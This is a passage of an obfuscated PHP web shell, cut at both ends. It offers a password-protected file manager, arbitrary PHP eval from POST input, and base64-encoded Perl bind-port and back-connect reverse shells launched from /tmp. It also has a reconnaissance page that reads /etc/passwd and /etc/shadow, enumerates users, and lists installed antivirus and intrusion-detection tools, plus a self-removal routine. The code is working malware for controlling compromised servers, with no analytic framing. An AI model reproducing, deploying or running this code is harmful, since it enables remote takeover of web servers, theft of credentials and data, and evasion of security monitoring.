"." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } goto a3d24; F5821: a28fe: goto Bcf93; dd724: d5238: goto E565d; b3bef: goto a28fe; goto Faff5; C4848: $sort = array('name', 1); goto efa34; B6d62: nWfzhHeader(); goto aaf1c; ab0c5: function nWfzhCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto A8402; b2f40: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto E9809; Fc18e: global $sort; goto C4848; D343d: nWfzhFooter(); goto F4aca; be11e: $i++; goto b3bef; a76db: echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto f2f43; b89a5: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto F939b; c27c1: if (!empty($_POST['p1'])) { goto d968b; d968b: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto f71d4; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto f71d4; case 'delete': goto c57c9; e2105: goto f71d4; goto ba991; A4f66: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto D1772; e81c1: eaff4: goto A6fec; d7293: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto e81c1; Bcd3c: $f = urldecode($f); goto d7293; D1772: if ($f == '..') { goto eaff4; } goto Bcd3c; A6fec: } Fd7c5: } goto e2105; c57c9: function deleteDir($path) { goto ab77b; d08fe: @rmdir($path); goto Ee907; Dc601: F8536: goto ccf0a; cee39: closedir($dh); goto d08fe; fe41a: goto F8536; goto acf14; D7554: if (basename($item) == ".." || basename($item) == ".") { goto F8536; } goto Cf727; ccf0a: if (!(($item = readdir($dh)) !== false)) { goto Cdb7d; } goto F77f7; Cf727: $type = filetype($item); goto A77b8; F77f7: $item = $path . $item; goto D7554; A77b8: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto fe41a; acf14: Cdb7d: goto cee39; ab77b: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto E8970; E8970: $dh = opendir($path); goto Dc601; Ee907: } goto A4f66; ba991: case 'paste': goto b19fa; b25bd: setcookie('f', '', time() - 3600); goto Df432; b19fa: if ($_COOKIE['act'] == 'copy') { goto F711b; cbdcb: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); Fefb7: } goto Eb544; Eb544: Bd36b: goto Ec02c; F711b: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto A96ec; A96ec: mkdir($d . $s); goto Bc253; aaaea: B63e1: goto a6a07; ed1b9: if (!(($f = @readdir($h)) !== false)) { goto B63e1; } goto D2541; D2541: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto C3f36; e7bb5: C0487: goto ed1b9; Bc253: $h = @opendir($c . $s); goto e7bb5; C3f36: goto C0487; goto aaaea; a6a07: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto cbdcb; Ec02c: } elseif ($_COOKIE['act'] == 'move') { goto b5fc0; Df7a3: feac0: goto a4f10; Cad98: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); fc84b: } goto Df7a3; b5fc0: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto Aba7b; Cb962: if (!(($f = @readdir($h)) !== false)) { goto ad3fd; } goto C215c; Bf5dc: Fe5cf: goto Cb962; F1c56: $h = @opendir($c . $s); goto Bf5dc; C0857: ad3fd: goto dc189; Aba7b: mkdir($d . $s); goto F1c56; C215c: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto c4a2b; c4a2b: goto Fe5cf; goto C0857; dc189: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto Cad98; a4f10: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto Eb134; E85af: foreach ($_COOKIE['f'] as $f) { goto Febbb; b82e4: f05e5: goto D8271; Febbb: if ($f == '..') { goto f05e5; } goto ade5b; ade5b: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto D82d9; d87d8: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); Fd1a6: } goto F5233; F5233: A749c: goto b5880; D82d9: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto d87d8; b5880: } goto b82e4; D8271: } goto D2595; eb3c3: chdir($GLOBALS['cwd']); goto Cf156; Cf156: $zip->close(); goto e2b0b; D2595: B2ea5: goto eb3c3; Eb134: chdir($_COOKIE['c']); goto E85af; e2b0b: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto Bf863; F4820: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } b85f2: } goto Bc7f8; Bc7f8: ef911: goto E3f31; Bf863: $zip = new ZipArchive(); goto F4820; E3f31: } } elseif ($_COOKIE['act'] == 'tar') { goto f4d1b; D6add: nWfzhEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto d0f01; D226c: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto D6add; f4d1b: chdir($_COOKIE['c']); goto D226c; d0f01: chdir($GLOBALS['cwd']); goto Ccd5c; Ccd5c: } goto f3edd; Df432: goto f71d4; goto b4114; f3edd: unset($_COOKIE['f']); goto b25bd; b4114: default: if (!empty($_POST['p1'])) { goto A9bba; F79e8: nWfzhsetcookie('f', serialize(@$_POST['f'])); goto ff241; ff241: nWfzhsetcookie('c', @$_POST['c']); goto df0a0; A9bba: nWfzhsetcookie('act', $_POST['p1']); goto F79e8; df0a0: } goto f71d4; } goto Bfd74; Cc420: f71d4: goto Dfa01; Bfd74: F4212: goto Cc420; Dfa01: } goto B6d62; d70eb: $dirContent = nWfzhScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto D79f0; E565d: echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto b3c20; E2f27: $GLOBALS['sort'] = $sort; goto ab0c5; Ccac1: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto c27c1; D79f0: if ($dirContent === false) { goto Feebd; Feebd: echo 'Can\'t open this folder!'; goto a3454; D2bb1: return; goto c59cf; a3454: nWfzhFooter(); goto D2bb1; c59cf: } goto Fc18e; B1dac: foreach ($files as $f) { goto a44af; D1a68: d59a1: goto da8bf; b892a: $l = $l ? 0 : 1; goto D1a68; a44af: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? nWfzhViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto b892a; da8bf: } goto dd724; f2f43: $dirs = $files = array(); goto f9d4f; E9809: Adb89: goto be11e; D214b: echo "</select> "; goto cbedb; b372f: $l = 0; goto B1dac; C1f15: echo "<option value='tar'>Compress (tar.gz)</option>"; goto E9a49; b008c: $files = array_merge($dirs, $files); goto b372f; c7bea: usort($dirs, "nWfzhCmp"); goto b008c; A8402: usort($files, "nWfzhCmp"); goto c7bea; efa34: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto a76db; a3d24: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto D343d; Ae099: $i = 0; goto F5821; f9d4f: $n = count($dirContent); goto Ae099; b3c20: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto C1f15; aaf1c: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto d70eb; e44bf: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto b89a5; Bcf93: if (!($i < $n)) { goto aeff8; } goto e44bf; E9a49: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto D214b; F4aca: } goto F6ac2; D7cf8: $auth_pass = ""; goto f5f32; C2e1c: function actionNetwork() { goto F81f6; e4494: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto f27fa; F81f6: nWfzhHeader(); goto A3a58; a9fd6: echo '</div>'; goto e0735; A3a58: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto e4494; ca3b6: if (isset($_POST['p1'])) { goto A8fdb; b9168: if ($_POST['p1'] == 'bcp') { goto Fe517; Df407: sleep(1); goto c902c; c902c: echo "<pre class=ml1>{$out}\n" . nWfzhEx("ps aux | grep bc.pl") . "</pre>"; goto f2dc2; dedcc: $out = nWfzhEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto Df407; f2dc2: unlink("/tmp/bc.pl"); goto Cc342; Fe517: cf("/tmp/bc.pl", $back_connect_p); goto dedcc; Cc342: } goto C60f0; E544d: if ($_POST['p1'] == 'bpp') { goto Af260; Af260: cf("/tmp/bp.pl", $bind_port_p); goto c22d9; c22d9: $out = nWfzhEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto e3ed6; B58c0: echo "<pre class=ml1>{$out}\n" . nWfzhEx("ps aux | grep bp.pl") . "</pre>"; goto E3987; E3987: unlink("/tmp/bp.pl"); goto dafc3; e3ed6: sleep(1); goto B58c0; dafc3: } goto b9168; A8fdb: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto E544d; C60f0: } goto a9fd6; f27fa: echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>"; goto ca3b6; e0735: nWfzhFooter(); goto De226; De226: } goto a186c; Bef43: $default_charset = 'Windows-1251'; goto Db647; D5f2e: function nWfzhLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto cc88d; f29b6: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto a0955; A8d99: function nWfzhPerms($p) { goto Ca4d0; B2970: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto A50e4; d0e9c: return $i; goto D0b65; d31c5: $i .= $p & 0x20 ? 'r' : '-'; goto A6434; d8ccc: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto d31c5; C016f: $i .= $p & 0x100 ? 'r' : '-'; goto A44b9; E9cf3: $i .= $p & 0x2 ? 'w' : '-'; goto B9fef; A6434: $i .= $p & 0x10 ? 'w' : '-'; goto B2970; A44b9: $i .= $p & 0x80 ? 'w' : '-'; goto d8ccc; A50e4: $i .= $p & 0x4 ? 'r' : '-'; goto E9cf3; Ca4d0: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto C016f; B9fef: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto d0e9c; D0b65: } goto D12f4; a892c: if (get_magic_quotes_gpc()) { goto A5b2c; Aaa8c: $_COOKIE = nWfzhstripslashes($_COOKIE); goto fea58; Cdeca: $_POST = nWfzhstripslashes($_POST); goto Aaa8c; A5b2c: function nWfzhstripslashes($array) { return is_array($array) ? array_map('nWfzhstripslashes', $array) : stripslashes($array); } goto Cdeca; fea58: } goto D5f2e; b7dff: function actionSecInfo() { goto b823e; A7c3c: nWfzhFooter(); goto f73ac; Dad9c: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto eed2f; B98fa: if (function_exists('apache_get_modules')) { nWfzhSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto e2178; eaeff: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto e6c67; A7fed: echo '<h1>Server security information</h1><div class=content>'; goto fa164; a7ecd: echo '<br>'; goto be235; f277b: nWfzhSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto B98fa; d2f9e: $temp = array(); goto Dad9c; eed2f: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto eaeff; be235: if ($GLOBALS['os'] == 'nix') { goto d5445; Ee6ae: nWfzhSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto E98f0; F00c2: if (!$GLOBALS['safe_mode']) { goto fd42e; F6dcb: nWfzhSecParam('Userful', implode(', ', $temp)); goto B3d7f; D0a44: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto Bca45; f3f6a: goto e85ed; goto D1ff0; db6aa: echo '<br/>'; goto a2565; a8fe9: $uid = @posix_getpwuid($_POST['p2']); goto D75c2; Bbb5b: e85ed: goto a5d77; a2565: nWfzhSecParam('Users', $temp); goto Fb32b; a5d77: if (!($_POST['p2'] <= $_POST['p3'])) { goto Cf8db; } goto a8fe9; D75c2: if ($uid) { $temp .= join(':', $uid) . "\n"; } goto fc73c; D1ff0: Cf8db: goto db6aa; fc73c: Bed8d: goto c4f83; c4f83: $_POST['p2']++; goto f3f6a; Bca45: $temp = ""; goto Bbb5b; Fb32b: } goto a97d3; e40fe: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto D0a44; Ae986: $temp = array(); goto f3c28; D4e9d: echo '<br>'; goto b15cf; df4a3: foreach ($userful as $item) { if (nWfzhWhich($item)) { $temp[] = $item; } B0aac: } goto D0288; f3c28: foreach ($downloaders as $item) { if (nWfzhWhich($item)) { $temp[] = $item; } e3c6f: } goto Fcaee; E74dc: nWfzhSecParam('Downloaders', implode(', ', $temp)); goto E0bdf; Fcaee: b8b9d: goto E74dc; E0bdf: echo '<br/>'; goto d304e; d304e: nWfzhSecParam('HDD space', nWfzhEx('df -h')); goto a49e1; a49e1: nWfzhSecParam('Hosts', @file_get_contents('/etc/hosts')); goto e40fe; B759a: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto D4e9d; D4689: nWfzhSecParam('Danger', implode(', ', $temp)); goto Ae986; a1536: Efb4b: goto D4689; B3d7f: $temp = array(); goto c49b5; D0288: Ade6c: goto F6dcb; b15cf: $temp = array(); goto df4a3; c49b5: foreach ($danger as $item) { if (nWfzhWhich($item)) { $temp[] = $item; } a174e: } goto a1536; b0e98: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto B759a; fd42e: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto b0e98; a97d3: } goto fa80a; d5445: nWfzhSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto Ee6ae; Fdd3e: nWfzhSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto F00c2; E98f0: nWfzhSecParam('OS version', @file_get_contents('/proc/version')); goto Fdd3e; fa80a: } else { goto a1e81; e84df: nWfzhSecParam('User Accounts', nWfzhEx('net user')); goto aff00; a1e81: nWfzhSecParam('OS Version', nWfzhEx('ver')); goto D5d44; D5d44: nWfzhSecParam('Account Settings', nWfzhEx('net accounts')); goto e84df; aff00: } goto e83b7; e2178: nWfzhSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto c7e2f; F7aa7: nWfzhSecParam('Supported databases', implode(', ', $temp)); goto a7ecd; c731b: nWfzhSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto A537f; c7e2f: nWfzhSecParam('Open base dir', @ini_get('open_basedir')); goto E1fe5; A537f: nWfzhSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto d2f9e; e83b7: echo '</div>'; goto A7c3c; e6c67: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto F7aa7; b823e: nWfzhHeader(); goto A7fed; E1fe5: nWfzhSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto c731b; fa164: function nWfzhSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto f277b; f73ac: } goto fec48; bfd72: function actionSelfRemove() { goto B5bdc; B5bdc: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto Fb5b4; f63e0: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto E53c0; E53c0: nWfzhFooter(); goto Bc63b; Fb5b4: if ($_POST['p1'] != 'yes') { nWfzhHeader(); } goto f63e0; Bc63b: } goto fbb7a; b8976: @ini_set('log_errors', 0); goto e8a7a; d6719: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { nWfzhLogin(); } } goto a7327; fec48: function actionPhp() { goto Fb873; d7e82: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto Bef6c; F7dad: phpinfo(); goto Cdc81; ee5c3: ob_start(); goto F7dad; Bef6c: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto ee5c3; Cdc81: $tmp = ob_get_clean(); goto e70b8; e70b8: $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto d5e23; d5e23: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto cb357; cb357: } goto b2015; Fb873: if (isset($_POST['ajax'])) { goto Ed118; Ed118: nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto c18e1; b05b8: eval($_POST['p1']); goto ac646; a4397: echo strlen($temp), "\n", $temp; goto Ff4b6; c18e1: ob_start(); goto b05b8; ac646: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto a4397; Ff4b6: exit; goto C6fa0; C6fa0: } goto A2eb1; A2eb1: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto c0171; B1ebc: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto D4a27; f53a1: echo '</pre></div>'; goto Aa97c; Aa97c: nWfzhFooter(); goto F3620; c0171: nWfzhHeader(); goto d7e82; D4a27: if (!empty($_POST['p1'])) { goto D8857; D8857: ob_start(); goto F9711; a5080: echo htmlspecialchars(ob_get_clean()); goto E325e; F9711: eval($_POST['p1']); goto a5080; E325e: } goto f53a1; b2015: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto B1ebc; F3620: } goto db69a; F6ac2: function actionStringTools() { goto A5f75; E26f9: echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>"; goto C5289; b07ab: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; Dcb22: } goto E55df; d44af: if (isset($_POST['ajax'])) { goto Fd5b0; Eedd2: echo strlen($temp), "\n", $temp; goto C0aa1; Fd5b0: nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Ed1e9; C0aa1: exit; goto a74ac; Ed1e9: ob_start(); goto Adc01; Adc01: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto Ee0ad; Ee0ad: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto Eedd2; a74ac: } goto B2c2d; B7f20: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto b07ab; c539d: nWfzhFooter(); goto F2648; f039e: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto df26e; Bf766: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto b8ab7; aaeda: Fb1ba: goto F338a; b8ab7: $r = ''; goto b18be; b418c: f34c7: goto f37ac; b18be: $i = 0; goto a0926; a5d55: if (!($i < strlen($p))) { goto Fb1ba; } goto F5004; a0926: E1b8d: goto a5d55; F5004: $r .= sprintf('%02X', ord($p[$i])); goto b418c; F338a: return strtoupper($r); goto B1a5b; f37ac: ++$i; goto e7ea2; e7ea2: goto E1b8d; goto aaeda; B1a5b: } } goto A7e35; E55df: Afcdc: goto E4862; A7e35: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto ec2a8; A6610: d7376: goto C7ad1; f2755: goto c84d0; goto Fdac2; Aec4d: c84d0: goto Ebca6; C7ad1: ++$i; goto f2755; e1418: $i = 0; goto 